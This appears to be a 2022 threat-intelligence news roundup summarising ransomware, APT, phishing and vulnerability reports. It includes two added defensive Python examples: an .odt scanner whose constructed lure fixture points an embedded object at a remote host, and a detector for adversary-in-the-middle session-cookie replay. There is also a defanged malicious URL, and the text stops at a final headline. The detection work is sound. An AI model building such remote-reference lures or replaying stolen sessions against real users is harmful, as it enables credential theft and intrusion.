    Russian Ransomware C2 Network Discovered in Censys Data

    Around June 24 2022, out of over 4.7 million hosts Censys observed in Russia, Censys discovered two Russian hosts containing an exploitation tool, Metasploit, and Command and Control (C2) tool, Deimos C2. Historical analysis indicated one of these Russian hosts also used the tool PoshC2. These tools allow penetration testers and hackers to gain access to and manage target hosts. Censys then used details from the PoshC2 certificate to locate, among hosts elsewhere in the world including the U.S., two additional Russian hosts also using the PoshC2 certificate. Censys data showed these two Russian hosts possessing confirmed malware packages, one of which included a ransomware kit and a file that indicated two additional Russian Bitcoin hosts.

    Justice Department Seizes $500K From North Korean Ransomware Group

    The Department of Justice (DoJ) on Tuesday said it disrupted the activities of a North Korean state-sponsored group, known for deploying the Maui ransomware, and seized $500,000 from the actors in May. These seized funds included ransom payments made by two healthcare providers impacted by the Maui ransomware over the past year. A medical center in Kansas was hit by the Maui ransomware in May 2021 and paid a ransom of $100,000 in Bitcoin to attackers. After the unnamed Kansas-based medical center reported the incident to the FBI, U.S. authorities were able to identify the ransomware family and trace the cryptocurrency back to China-based money launderers.

    This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies

    The 8220 cryptomining group has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021. "8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne said in a Monday report.

    New Luna Ransomware Encrypts Windows, Linux, and ESXi Systems

    A new ransomware family dubbed Luna can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems. Discovered by Kaspersky security researchers via a dark web ransomware forum ad spotted by the company's Darknet Threat Intelligence active monitoring system, Luna ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.

    FBI Warns of Fake Cryptocurrency Apps Used to Defraud Investors

    Yesterday, the FBI released an alert warning financial institutions and investors about how cybercriminals are creating fraudulent cryptocurrency investment applications to steal funds from US investors. “The FBI has observed cybercriminals contacting US investors, fraudulently claiming to offer legitimate cryptocurrency investment services, and convincing investors to download fraudulent mobile apps, which the cybercriminals have used with increasing success over time to defraud the investors of their cryptocurrency,” says the FBI.

    Experts Uncover New CloudMensis Spyware Targeting Apple macOS Users

    Security researchers at ESET recently disclosed details of a previously undocumented spyware that is being used to target the Apple macOS operating system. Dubbed CloudMensis, the malware was first discovered in April 2022. Written in Objective-C, CloudMensis is built for both Intel and Apple silicon architectures. According to ESET, the malware exclusively uses public cloud storage services such as pCloud, Yandex Disk, and Dropbox to receive attacker commands and exfiltrate files.

    Russian SVR Hackers Use Google Drive, Dropbox to Evade Detection

    State-backed hackers of Russia’s Foreign Intelligence Service (SVR) have started using Google Drive, a legitimate cloud storage service, to evade detection. By using online storage services trusted by millions worldwide to exfiltrate data and deploy their malware and malicious tools, the Russian threat actors are abusing that trust to render their attacks exceedingly tricky or even impossible to detect and block.

    APT Groups Target Journalists and Media Organizations Since 2021

    Proofpoint researchers warn that APT groups have been regularly targeting and posing as journalists and media organizations since early 2021. The media sector is a valuable target for this category of attackers because of the access its operators have to sensitive information that could align with the interests of state actors. The report published by Proofpoint focuses on the activities of APT actors linked to China, North Korea, Iran, and Turkey.

    New Netwrix Auditor Bug Could Let Attackers Compromise Active Directory Domain

    Researchers have disclosed details of a security vulnerability in the Netwrix Auditor application that, if successfully exploited, could lead to arbitrary code execution on affected devices. “Since this service is typically executed with extensive privileges in an Active Directory environment, the attacker would likely be able to compromise the Active Directory domain” (Bishop Fox, 2022). Auditor is an auditing and visibility platform that gives organizations a consolidated view of their IT environments, including Active Directory, Exchange, file servers, SharePoint, VMware, and other systems, all from a single console. Netwrix, the company behind the software, claims more than 11,500 customers across over 100 countries, including Airbus, Virgin, King's College Hospital, and Credissimo.

    Password Recovery Tool Infects Industrial Systems With Sality Malware

    Cybersecurity firm Dragos recently uncovered a campaign that is infecting industrial control systems to create a botnet by leveraging a password “cracking” software for programmable logic controllers (PLCs). Threat actors are advertising the software on various social media websites, with the promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic. According to researchers at Dragos, the tool leverages a known vulnerability to retrieve passwords on command. The flaw tracked as CVE-2022-2003 is related to a case of cleartext transmission of sensitive data. If exploited successfully, it could lead to information disclosure and unauthorized changes.

    Attackers Scan 1.6 Million WordPress Sites for Vulnerable Plugin

    Security researchers have detected a massive campaign that scanned close to 1.6 million WordPress sites for the presence of a vulnerable plugin that allows uploading files without authentication. The attackers are targeting the Kaswara Modern WPBakery Page Builder, which was abandoned by its author before receiving a patch for a critical-severity flaw tracked as CVE-2021-24284.

    Stealthy OpenDocument Malware Deployed Against Latin American Hotels

    In late June 2022, HP Wolf Security isolated an unusually stealthy malware campaign that used OpenDocument text (.odt) files to distribute malware (T1204.002). OpenDocument is an open, vendor-neutral file format compatible with several popular office productivity suites, including Microsoft Office, LibreOffice and Apache OpenOffice. As described in HP Wolf Security’s blog post, the campaign targets the hotel industry in Latin America: targeted hotels receive emails with fake booking requests, with the malicious document attached. If the user opens the document, they are shown a prompt asking whether fields with references to other files should be updated. An Excel file opens if they click ‘Yes’ to this cryptic message.
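
    The "update fields" prompt fires because the document's XML carries references that point outside the file. An .odt is a zip container whose content.xml uses xlink:href on embedded objects, so a gateway can open it and look for hrefs with a remote scheme before any office suite does. The checker below is an added example, not HP Wolf Security's code: it builds a constructed .odt whose draw:object points at a remote host and a benign one whose object is internal, then reports external references from the document parts. The sample address and the list of external schemes are assumptions.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
EXTERNAL_PREFIXES = ("http://", "https://", "ftp://", "smb://", "file://", "\\\\")
PARTS_TO_CHECK = ("content.xml", "styles.xml", "settings.xml")

CONTENT_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<office:document-content'
    ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
    ' xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"'
    ' xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"'
    ' xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<office:body><office:text><text:p>Booking request for 12 guests</text:p>'
    '<draw:frame draw:name="Object1"><draw:object xlink:href="{href}" xlink:type="simple"'
    ' xlink:show="embed" xlink:actuate="onLoad"/></draw:frame>'
    '</office:text></office:body></office:document-content>'
)


def build_sample_odt(object_href):
    """Constructed .odt: the ODF zip container with a mimetype entry and a content.xml holding one
    draw:object whose xlink:href is object_href. A fixture, not the campaign's document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # ODF requires the mimetype entry first and uncompressed
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text", compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", CONTENT_TEMPLATE.format(href=object_href), compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def _local(tag):
    return tag.rsplit("}", 1)[-1]


def find_external_references(odt_bytes):
    """List (part, element, href) for every xlink:href in the document XML that points off the document.
    Internal references such as './Object 1' or '#bookmark' are skipped."""
    refs = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        for part in PARTS_TO_CHECK:
            if part not in z.namelist():
                continue
            for elem in ET.fromstring(z.read(part)).iter():
                href = elem.get(XLINK_HREF)
                if href and href.lower().startswith(EXTERNAL_PREFIXES):
                    refs.append((part, _local(elem.tag), href))
    return refs


# Constructed: a booking-request lure whose embedded object lives on a remote host (TEST-NET-3 address).
REMOTE_OBJECT_ODT = build_sample_odt("http://203.0.113.10/booking/details.xlsx")
BENIGN_ODT = build_sample_odt("./Object 1")
```

    Walking every element for xlink:href, rather than only draw:object, also catches remote images and linked text sections, which trigger the same update prompt.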

    BlackCat Ransomware Group Deploys Brute Ratel Pen Testing Kit

    According to security company Sophos, the BlackCat ransomware group has begun using Brute Ratel, a penetration testing suite that includes remote access features useful to attackers. We reported last week that other threat groups have added Brute Ratel to their toolkit, along with, or instead of, the popular Cobalt Strike. Sophos found that several of its customers were impacted by BlackCat after the group exploited unpatched firewalls and VPNs connected to internal systems (T1190). “The attackers used vulnerabilities reported as early as 2018 to read memory from VPN systems and then log in as an authorized user. They dumped domain controller passwords (T1003.001) along the way, using the latter to create accounts with administrative privileges (T1078.002). They then ran a scanning tool (netscanportable.exe) (T1082, T1049, T1124) to find additional targets and then spread internally via RDP (T1021.001).” The attacks targeted both Windows machines and ESXi hypervisor servers.

    Pakistani Hackers Targeting Indian Students in Latest Malware Campaign

    The advanced persistent threat (APT) group known as Transparent Tribe has been attributed to a new ongoing phishing campaign targeting students at various educational institutions in India at least since December 2021. "This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users," Cisco Talos said in a report shared with The Hacker News.

    Microsoft Details App Sandbox Escape Bug Impacting Apple iOS, iPadOS, macOS Devices

    On Wednesday, Microsoft published details of a vulnerability in macOS that could allow specially crafted code to escape the App Sandbox and run unrestricted on the system. The flaw is tracked as CVE-2022-26706 and was addressed in the security updates Apple released on May 16, 2022. Apple’s App Sandbox is an access control technology designed to regulate a third-party app’s access to system resources and user data. Although the sandbox does not prevent attacks against apps, it helps reduce the impact of a successful attack by restricting the app to the minimum set of privileges it requires to function. According to Microsoft, specially crafted code could escape the sandbox, allowing an attacker to gain elevated privileges on the affected device or execute malicious commands such as installing additional payloads.

    New Lilith Ransomware Emerges with Extortion Site, Lists First Victim

    Researchers from Cyble released details this week on a new ransomware strain called Lilith. The group has posted its first victim on a data leak site, which will be used in double-extortion attacks. It joins RedAlert and 0mega as new members of the ransomware scene. “Lilith is a C/C++ console-based ransomware discovered by JAMESWT and designed for 64-bit versions of Windows. Like most ransomware operations launching today, Lilith performs double-extortion attacks, which is when the threat actors steal data before encrypting devices.”

    VMware Fixed a Flaw in vCenter Server Discovered Eight Months Ago

    VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048, in vCenter Server’s IWA (Integrated Windows Authentication) mechanism eight months after its disclosure. It is unclear why the vulnerability did not receive a patch sooner; attackers could have leveraged it before the patch was released, especially if exploit code was available. In previous attacks we have observed threat actors leveraging VMware products to deploy ransomware and disrupt business operations. Data encrypted by ransomware strains targeting hypervisors often stays encrypted or becomes corrupted during decryption.

    Socelars-Spyware Analysis

    Socelars is a typical piece of spyware that searches the affected system for specific information and sends it to the threat actor. It is usually delivered as a download by other malware or by an exploit kit. Static analysis shows that the sample has an unusually small import table, suggesting that it resolves APIs dynamically at runtime through LoadLibraryA and GetProcAddress in order to hide its functionality.

    AIRAVAT Malware Targeting Android Users

    While conducting our routine Open-Source Intelligence (OSINT) research, we came across a Twitter post wherein the researcher mentioned an open-directory website “hxxp://blindajeseguro[.]online,” which was hosting a malicious Android application. Upon analyzing the application, they observed that the Threat Actor (TA) was using the source code of the “Pro” version of AIRAVAT RAT, which the TA may have bought from the AIRAVAT author. AIRAVAT is a multifunctional Android RAT with a web panel that does not require port forwarding. The source code of AIRAVAT’s basic version is available on GitHub, while the Pro version’s source code is not publicly available.

    Microsoft Warns of Large-Scale AiTM Phishing Attacks Against Over 10,000 Organizations

    Yesterday, Microsoft disclosed a large-scale phishing campaign that has targeted over 10,000 organizations since September 2021 by hijacking Office 365’s authentication process, even for accounts secured with multi-factor authentication (MFA). "The attackers then used the stolen credentials and session cookies to access affected users' mailboxes and perform follow-on business email compromise (BEC) campaigns against other targets," said Microsoft. The intrusions entailed setting up adversary-in-the-middle (AiTM) phishing sites, in which the adversary deploys a proxy server between the victim and the targeted website, so that recipients of a phishing email are redirected to lookalike landing pages designed to capture credentials, MFA responses and the resulting session cookie.
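
    The MFA prompt is satisfied by the real user, so the signal is not in authentication but in what happens to the session afterwards: the cookie that was minted for one IP address and client is presented from another. The detector below is an added example, not Microsoft's, run over a constructed sign-in and activity log: it binds each session to the IP and user agent that completed MFA, alerts when the same session later appears from a different IP and a different client within a window, and raises severity when that replayed session creates an inbox rule, the usual first step of the follow-on BEC. Session ids, users, addresses, action names and the 24-hour window are assumptions.

```python
from datetime import datetime, timedelta

REPLAY_WINDOW = timedelta(hours=24)   # assumed lifetime within which a stolen cookie is typically reused


def _ev(hour, minute, user, session, ip, ua, auth, action):
    return {"time": datetime(2022, 7, 12, hour, minute), "user": user, "session": session,
            "ip": ip, "ua": ua, "auth": auth, "action": action}


CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/103.0"
# Constructed sign-in and activity log. Session ids, users and addresses are illustrative.
SAMPLE_LOG = [
    # alice signs in with password + MFA through the phishing proxy (198.51.100.20 is the proxy, not her PC)
    _ev(9, 0, "alice@example.com", "S1", "198.51.100.20", CHROME, "interactive_mfa", "sign_in"),
    # twenty minutes later her session cookie is presented from a different host and client
    _ev(9, 20, "alice@example.com", "S1", "203.0.113.44", "python-requests/2.28", "session_cookie", "mail_read"),
    _ev(9, 25, "alice@example.com", "S1", "203.0.113.44", "python-requests/2.28", "session_cookie", "inbox_rule_create"),
    # bob: normal day, same device throughout
    _ev(8, 30, "bob@example.com", "S2", "192.0.2.15", CHROME, "interactive_mfa", "sign_in"),
    _ev(10, 0, "bob@example.com", "S2", "192.0.2.15", CHROME, "session_cookie", "mail_read"),
    # carol: address changes (VPN) but the client fingerprint does not, so no alert on its own
    _ev(8, 45, "carol@example.com", "S3", "192.0.2.40", CHROME, "interactive_mfa", "sign_in"),
    _ev(11, 0, "carol@example.com", "S3", "198.51.100.9", CHROME, "session_cookie", "mail_read"),
]
BEC_ACTIONS = {"inbox_rule_create", "mailbox_forwarding_set"}


def detect_session_replay(events, window=REPLAY_WINDOW):
    """Bind each session id to the IP and client that completed MFA; flag later cookie use from a different
    IP *and* client within the window, raising severity when the replayed session touches mailbox rules."""
    origin, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        sid = ev["session"]
        if ev["auth"] == "interactive_mfa":
            origin[sid] = ev
            continue
        first = origin.get(sid)
        if first is None or ev["time"] - first["time"] > window:
            continue
        if ev["ip"] != first["ip"] and ev["ua"] != first["ua"]:
            alerts.append({"user": ev["user"], "session": sid, "mfa_ip": first["ip"], "replay_ip": ev["ip"],
                           "action": ev["action"],
                           "severity": "high" if ev["action"] in BEC_ACTIONS else "medium"})
    return alerts
```

    Requiring both the address and the client to change keeps VPN roaming out of the alert queue; the trade-off is that an attacker who copies the victim's user agent into their tooling needs a second signal, such as device compliance or token binding, to be caught.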

    CISA Orders Agencies to Patch New Windows Zero-Day Used in Attacks

    As a part of the July 2022 Patch Tuesday, Microsoft patched an actively exploited high severity zero-day that impacts both server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. Tracked as CVE-2022-22047, the flaw is related to a local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem. According to Microsoft, successful exploitation of CVE-2022-22047 could enable a threat actor to gain SYSTEM privileges. Yesterday, CISA added the vulnerability to its list of bugs abused in the wild. Organizations have been given three weeks, until August 2nd, to patch CVE-2022-22047 and block ongoing attacks that could target their systems.

    New ‘Luna Moth’ hackers breach orgs via fake subscription renewals

    A new data extortion group has been breaching companies to steal confidential information, threatening to make the files publicly available unless victims pay a ransom. The gang has been named Luna Moth and has been active since at least March in phishing campaigns that delivered remote access tools (RATs) that enable the corporate data theft. Researchers tracking the activity of the Luna Moth group note that the actor is trying to build a reputation under the name Silent Ransom Group (SRG). In a report earlier this month, Sygnia says that the modus operandi of Luna Moth (also tracked as TG2729) resembles that of a scammer, although the focus is on getting access to sensitive information.

    Microsoft 365 Patches for Windows 7 to End in 2023

    Microsoft has warned users clinging to Windows 7 and Windows 8.1 that the end really is near: “Windows 7 went out of support in 2020, but Microsoft recognized that many enterprises were quite happy where they were. For a fee, it made Extended Security Updates (ESU) available, which would at least deal with security patches.” Released in 2009, Windows 7 outlived its successor Windows 8, but now the time has come to say goodbye. If Windows is your thing, Microsoft would be more than happy to direct you to 10 or 11. There are also plenty of alternatives out there these days, certainly compared to 2009.

    Cloud-based Cryptocurrency Miners Targeting GitHub Actions and Azure VMs

    GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes. "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily," Trend Micro researcher Magno Logan said in a report last week.

    CEO of Dozens of Companies Charged in Scheme to Traffic An Estimated $1bn in Fake Cisco Devices

    The US Department of Justice (DOJ) announced last Friday that a Florida resident named Ron Aksoy has been arrested and charged for allegedly selling thousands of fraudulent and counterfeit Cisco products over the course of 12 years. Aksoy who also goes by Dave Durden is said to have run at least 19 companies formed in New Jersey and Florida, at least 15 Amazon storefronts, roughly 10 eBay storefronts, and multiple other entities with an estimated retail value of over $1 billion. According to court documents, the fake companies imported tens of thousands of counterfeit Cisco networking devices from China and Hong Kong and resold them to customers in the US and overseas, falsely representing the products as new and genuine.

    Lithuanian Energy Firm Disrupted by DDOS Attack

    “Lithuanian energy company Ignitis Group was hit by what it described as its ‘biggest cyber-attack in a decade’ on Saturday when numerous distributed denial of service (DDoS) attacks were aimed at it, disrupting its digital services and websites (T1498 - Network Denial of Service). Pro-Russian hacking group Killnet claimed responsibility for the attack on its Telegram channel on Saturday, making this the latest in a series of attacks launched by the group in Lithuania due to that country’s support for Ukraine in the war with Russia” (Info Security Magazine, 2022). On July 9th, the company announced on its Facebook page that it had managed to limit the attack’s impact on its systems, and while no breaches were recorded, the company appears to be dealing with continued attacks.

    New Phishing Attacks Shame, Scare Victims into Surrendering Twitter, Discord Credentials

    A recent wave of social media phishing schemes doubles down on aggressive scare tactics with phony account-abuse accusations to coerce victims into handing over their login details. Last week alone, Malwarebytes Labs uncovered two phishing scams, targeting Twitter and Discord (a voice, video, and text chat app). The Twitter phishing scam sends users a direct message (DM) flagging their account for use of hate speech and requesting the user authenticate the account to avoid a suspension. Users are then redirected to a fake "Twitter help center," which asks for the user's login credentials.

    New Omega Ransomware Targets Businesses in Double-extortion Attacks

    A new ransomware operation named ‘0mega’ targets organizations worldwide in double-extortion attacks and demands millions of dollars in ransoms. 0mega (spelled with a zero) is a new ransomware operation launched in May 2022 and has attacked numerous victims since then. While it is unclear how files are encrypted by 0mega, the ransomware appends the .Omega extension to the encrypted file’s names and creates ransom notes called DECRYPT-FILES.txt. The ransom notes are said to be customized for each victim and usually contain the company name as well as a description of the data stolen. In some cases, the notes will threaten victims to disclose the attack to business partners and trade associations if a ransom is not paid.

    PyPI Repository Makes 2FA Security Mandatory for Critical Python Projects

    The maintainers of the official third-party software repository for Python have begun imposing a new two-factor authentication (2FA) condition for projects deemed "critical." "We've begun rolling out a 2FA requirement: soon, maintainers of critical projects must have 2FA enabled to publish, update, or modify them," Python Package Index (PyPI) said in a tweet last week. "Any maintainer of a critical project (both 'Maintainers' and 'Owners') are included in the 2FA requirement," it added.

    Rozena Backdoor Delivered by Exploiting the Follina Bug

    “Fortinet FortiGuard Labs researchers observed a phishing campaign (T1566.001) that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) (T1190) to distribute the Rozena backdoor on Windows systems” (Security Affairs, 2022). Follina is a remote code execution vulnerability related to the Microsoft Windows Support Diagnostic Tool (MSDT). This new backdoor, dubbed Rozena, is able to inject a remote shell connection back to the attacker’s machine using weaponized Office documents (T1204.002). Once clicked, the Office document connects to an external Discord CDN URL (T1090.004) to download an HTML file.

    QNAP Warns of New Checkmate Ransomware Targeting NAS devices

    Taiwan-based network-attached storage (NAS) maker QNAP is warning customers to secure their devices against attacks pushing Checkmate ransomware payloads. Checkmate is a recently discovered ransomware operation that first came into the spotlight in May 2022. According to QNAP, operators of the Checkmate ransomware are targeting internet-exposed QNAP devices with the SMB service enabled and accounts with weak passwords that can easily be cracked in brute-force attacks.

    TrickBot Gang Shifted its Focus on "Systematically" Targeting Ukraine

    Since the Russian invasion, researchers at IBM’s Security X-Force team have uncovered evidence indicating that the Russia-based cybercriminal syndicate “Trickbot group” has resorted to systematically targeting Ukraine - an unprecedented shift as the group had not previously targeted Ukraine. TrickBot, aka ITG23, Gold Blackburn, and Wizard Spider, is a financially motivated cybercrime gang that is known for the development of the TrickBot banking trojan. In the past, groups like Conti have used the banking trojan to siphon account credentials and deploy ransomware payloads on victims’ systems.

    Large-scale Cryptomining Campaign is Targeting the NPM JavaScript Package Repository

    Researchers from Checkmarx released details on a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. They have dubbed the campaign “CuteBoi”, as a tribute to the “cute” username hardcoded in many of the packages’ configuration files and to one of the non-random NPM usernames the attacker is using, “cloudyboi12”. “Threat actors behind the campaign published 1,283 malicious modules in the repository and used over 1,000 different user accounts. The researchers uncovered the supply chain attack after noticing a burst of suspicious NPM users and packages being automatically created” (Security Affairs, 2022). Over 1200 npm packages were released to the registry by thousands of different user accounts. The process was automated and included the ability to pass NPM's 2FA challenge.

    Microsoft Rolls Back Decision to Block Office Macros by Default

    While Microsoft announced earlier this year that it would block VBA macros on downloaded documents by default, Redmond said on Thursday that it will roll back this change based on "feedback" until further notice. The company has also failed to explain the reason behind this decision and is yet to publicly inform customers that VBA macros embedded in malicious Office documents will no longer be blocked automatically in Access, Excel, PowerPoint, Visio, and Word.

    FBI and MI5 Bosses Warn of “Massive” China Threat

    The leaders of MI5 and the FBI shared the stage for the first time yesterday in a bid to warn business leaders and academics of the seriousness of the espionage threat from China. British intelligence boss Ken McCallum explained that the Communist Party and the government it controls have been engaged for years in attempts to steal “world-leading expertise, technology, research and commercial advantage” to boost China’s global standing. China is using various methods to steal intellectual property from foreign countries, including Chinese spies operating undercover, M&A and “tech transfers” from Western to Chinese firms, and co-opting local contacts who are sometimes oblivious to what they are doing.

    Ransomware, Hacking Groups Move from Cobalt Strike to Brute Ratel

    Researchers from Palo Alto’s Unit 42 warn this week that cybercriminals are moving away from Cobalt Strike to the newer Brute Ratel post-exploitation toolkit. The move away from the popular Cobalt Strike toolkit allows them to better evade detection by Endpoint Detection and Response (EDR) and antivirus solutions. “Corporate cybersecurity teams commonly consist of employees who attempt to breach corporate networks (red team) and those who actively defend against them (blue team). Both teams then share notes after engagements to strengthen the cybersecurity defenses of a network. For years, one of the most popular tools in red team engagements has been Cobalt Strike, a toolkit allowing attackers to deploy "beacons" on compromised devices to perform remote network surveillance or execute commands.”

    Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities

    On Wednesday, Cisco released security updates to address multiple vulnerabilities in the API and the web-based management interface of Cisco Expressway series and Cisco TelePresence Video Communication Server (VCS). The most severe flaw, tracked as CVE-2022-20812 (CVSS: 9), is related to an arbitrary file overwrite vulnerability in the cluster database API of Cisco Expressway Series and Cisco TelePresence VCS. Successful exploitation could allow an authenticated, remote attacker with Administrator read-write privileges on the application to conduct path traversal attacks on an affected device and overwrite files on the operating system as a root user.

    OpenSSL Releases Patch for High-Severity Bug that Could Lead to RCE Attacks

    OpenSSL released security fixes to address a high-severity bug in the cryptographic library that could potentially lead to remote code execution under certain scenarios. OpenSSL is a general-purpose cryptography library that offers an open-source implementation of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, enabling users to generate private keys, create certificate signing requests (CSRs), and install SSL/TLS certificates.

    Bitter APT Hackers Continue to Target Bangladesh Military Entities

    Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter. "Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5. The findings from the Berlin-headquartered company build on a previous report from Cisco Talos in May, which disclosed the group's expansion in targeting to strike Bangladeshi government organizations with a backdoor called ZxxZ.

    Hive Ransomware Upgrades to Rust for More Sophisticated Encryption Method

    Microsoft recently published a blog post uncovering a new variant of the Hive ransomware. According to Microsoft’s Threat Intelligence Center, the Hive ransomware-as-a-service has fully migrated to the Rust programming language, allowing it to adopt a more sophisticated encryption method. "Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension," MSTIC explained.

    US Govt Warns of Maui Ransomware Attacks Against Healthcare Orgs

    “The FBI, CISA, and the U.S. Treasury Department issued today a joint advisory warning of North-Korean-backed threat actors using Maui ransomware in attacks against Healthcare and Public Health (HPH) organizations” (Bleeping Computer, 2022). The advisory comes after the FBI detected multiple Maui ransomware attacks against the healthcare sector starting in May 2021. According to the FBI, North Korean state-sponsored threat actors are using the Maui ransomware to target organizations responsible for healthcare services. Specifically, the threat actors are looking to encrypt electronic health records services, diagnostics services, imaging services, and intranet services. In some of these cases, cyber incidents impacted services provided by HPH sector organizations for prolonged periods of time, which could result in public safety concerns and even death.

    NPM Supply-Chain Attack Impacts Hundreds of Websites and Apps

    An NPM supply-chain attack dating back to December 2021 used dozens of malicious NPM modules containing obfuscated Javascript code to compromise hundreds of downstream desktop apps and websites. As researchers at supply chain security firm ReversingLabs discovered, the threat actors behind this campaign (known as IconBurst) used typosquatting to infect developers looking for very popular packages, such as umbrellajs and ionic.io NPM modules. If fooled by the very similar module naming scheme, they would add the malicious packages designed to steal data from embedded forms (including those used for sign-in) to their apps or websites.

    Google Patches New Chrome Zero-Day Flaw Exploited in Attacks

    Yesterday, Google released Chrome 103.0.5060.114 to address a high-severity zero-day vulnerability that attackers are currently exploiting in the wild. Tracked as CVE-2022-2294, the flaw is related to a heap-based buffer overflow weakness in the WebRTC (Web Real-Time Communications) component of Chrome. For its part, WebRTC is a free and open-source project that enables real-time voice, text, and video communications capabilities between web browsers and devices. While Google has yet to share technical details about the bug, the impact of successful heap overflow exploitation can range from program crashes and arbitrary code execution to bypassing security solutions if code execution is achieved during the attack.

    Hacker Claims to Have Stolen Data on 1 Billion Chinese Citizens

    An anonymous threat actor is selling several databases they claim contain more than 22 terabytes of stolen information on roughly 1 billion Chinese citizens for 10 bitcoins (approximately $195,000). The announcement was posted on a hacker forum by someone using the handle 'ChinaDan,' saying that the information was leaked from the Shanghai National Police (SHGA) database. Based on the information they shared regarding the allegedly stolen data, the databases contain Chinese national residents' names, addresses, national ID numbers, contact information, and several billion criminal records.

    ZuoRAT is a Sophisticated Malware that Mainly Targets SOHO Routers

    Researchers from Lumen released details on a new malware campaign leveraging infected SOHO routers to target victims in North America and Europe. The malware, called ZuoRAT, shows a high level of sophistication, and samples date back to 2020. Lumen researchers believe the malware may be attributable to a state-sponsored threat actor due to its complexity. “SOHO is short for small office/home office and SOHO routers are hardware devices that route data from a local area network (LAN) to another network connection. Modern SOHO routers have almost the same functions as home broadband routers, and small businesses tend to use the same models. Some vendors also sell routers with advanced security and manageability features, but most SOHO devices are only monitored in exceptional cases.”

    US Publisher Macmillan Confirms Cyberattack Forced Systems Offline

    Macmillan, one of the largest book publishers in the U.S., said it has been hit by a cyberattack that forced it to shut down its IT systems. Macmillan spokesperson Erin Coffey told TechCrunch that the company recently experienced a “security incident” that “involved the encryption of certain files on our network.” The attack struck the company on June 25, according to reports, and also impacted its U.K. branch, known as Pan Macmillan.

    Korean Cybersecurity Agency Released a Free Decryptor for Hive Ransomware

    South Korean cybersecurity agency KISA recently published a free decryptor tool that can be used to recover files encrypted by the Hive ransomware (version 1 through version 4). Users can find step-by-step instructions on how to recover their encrypted data using the manual provided in the announcement by the KISA agency. The news comes after a team of researchers at Kookmin University (South Korea) discovered a flaw in the encryption algorithm used by Hive Ransomware, enabling them to decrypt data without knowing the private key used by the gang to encrypt files.

    Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

    A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign. "The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "The group has actively updated its techniques and payloads over the last year." 8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks.

    Xloader Returns With New Infection Technique

    Xloader is a rebranded version of the Formbook stealer. It is designed as a malicious tool to steal credentials from different web browsers, collect screenshots, monitor and log keystrokes from the victim’s machine, and send them to a Command and Control (C&C) server. Typically, Xloader spreads via spam emails that trick victims into downloading a malicious attachment file, such as MS Office documents, PDF documents, etc. During Cyble’s routine threat-hunting exercise, the team came across a Twitter post wherein a researcher mentioned an interesting infection chain of Xloader malware.

    Microsoft Exchange Servers Worldwide Backdoored with New Malware

    Attackers used a newly discovered malware to backdoor Microsoft Exchange servers belonging to government and military organizations from Europe, the Middle East, Asia, and Africa. The malware was dubbed SessionManager by security researchers at Kaspersky, who first spotted it in early 2022. The malware is a malicious native-code module for Microsoft's Internet Information Services (IIS) web server software.

    FBI Alert: MedusaLocker

    Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    AstraLocker 2.0 Infects Users Directly From Word Attachments

